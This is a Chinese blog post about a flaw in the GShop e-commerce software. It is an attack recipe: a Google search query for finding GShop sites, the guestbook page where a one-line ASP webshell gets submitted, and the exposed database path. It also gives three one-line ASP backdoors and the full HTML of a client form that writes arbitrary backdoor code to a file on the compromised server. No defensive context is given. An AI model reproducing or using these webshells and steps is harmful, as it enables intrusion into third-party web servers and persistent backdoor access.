GShop小小漏洞
来源:互联网 发布:淘宝上做什么生意好做 编辑:程序博客网 时间:2024/04/29 03:41
GShop小小漏洞
搜索:
http://www.google.cn/search?q=%22Powered+By+GShop%22&hl=zh-CN&rlz=1T4GGLL_zh-CNCN318CN318&newwindow=1&start=0&sa=N
提交一句话木马:
http://www.xxx.com/guestbook.asp
数据库地址:
http://www.xxx.com/db/YZ_Consume.asp
提供三个服务端:
1. <%eval request("si")%>
2. <%execute request("si")%>
3. <%execute(request("si"))%>
把红色的si换成您的密码,解决了原一句话ASP木马的错误,只要用"eval"替换掉"execute"服务端,就不会出错了!
<html>
<head>
<title>一句话ASP木马完美版</title>
<style type="text/css">
<!--
body {
background-color: #ffffff;
}
.bad {
border: 1px solid #000000;
font-size: 12px;
}
-->
</style>
</head>
<body bgcolor="#FFFFFF" link="#FFFFFF" vlink="#FFFF00" alink="#FFFFFF">
<center>
<div style="width: 350; line-height: 35pt; font-size:16pt; font-family:Comic Sans MS; color: #ffffff; position: relative;
filter:glow(color=#336699, strength=15)"><b>一句话ASP木马完美版</b></div>
<table width="627" border="0" align="center" class="bad" height="14" cellspacing="0">
<tr>
<td height="1" width="794">
<form method="post" name="pass">
<font color="#000000">服务端网址:</font><input name="act" type="text" id="act" size="84" value="http://"> <input type="submit" value="提交" onClick="this.form.cnnsc.name=this.form.password.value;this.form.action=this.form.act.value;">
<br>
登陆密码:<input name="password" type="text" id="password" value="" size="93">
<input type="hidden" name="cnnsc" id="cnnsc" value="Execute("Session(""cnnsc"")=request(""*""):Execute(Session(""cnnsc""))")">
</td>
</tr>
<tr>
<td height="100" width="794">
<textarea name="*" cols="100" rows="9" width="45">
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("pass")
lP.SaveToFile server.mappath("sH.asp"),2
lP.Close
set lP=nothing
response.redirect "sH.asp"</textarea>
</td>
</tr>
<tr>
<td height="1" width="794">
<textarea name="pass" cols="100" rows="15" width="45">
这里输入您的ASP后门代码</textarea>
</td>
</tr>
<tr>
<td width="794" height="7">
<font color="#000000">提供三个服务端:</font>
<br>
1. <%eval request("<font color="red">si</font>")%>
<br>
2. <%execute request("<font color="red">si</font>")%>
<br>
3. <%execute(request("<font color="red">si</font>"))%>
<br>
把红色的<font color="red">si</font>换成您的密码,解决了原一句话ASP木马的错误,只要用"<font color="red">eval</font>"替换掉"<font color="red">execute</font>"服务端,就不会出错了!<br>
</td>
</tr>
</table>
</body>
</html>
- GShop小小漏洞
- 【SPOJ-GSHOP】Rama and Friends【贪心】【细节】
- 小小
- 《ODAY安全:软件漏洞分析技术》学习心得-----shellcode的一点小小的思考
- 《ODAY安全:软件漏洞分析技术》学习心得-----shellcode的一点小小的思考
- 编程小小小小问题
- 小小麻雀
- 小小卡片!
- 小小笑话
- 小小备份
- 小小黑白片
- 小小一步
- 小小功能
- 小小计算器
- 小小菜鸟
- 小小笑话
- 小小封装
- 小小经验总结
- lambda表达式
- SQL convert函数
- 拥塞窗口cwnd的理解
- STGM常量的使用说明,翻译的MSDN上的资料(转)
- 一次不为兴趣的学习
- GShop小小漏洞
- linux裁剪(DOM上)
- linux系统调用与文件I/O操作
- 嵌入式linux系统裁剪
- Java .class files decompile tools
- 微软外包面试题
- 最小的Linux系统制作过程详解
- 编译只带initramfs的linux kernel, kernel source version 2.6.18
- 如何让linux下tablet pc触摸功能可用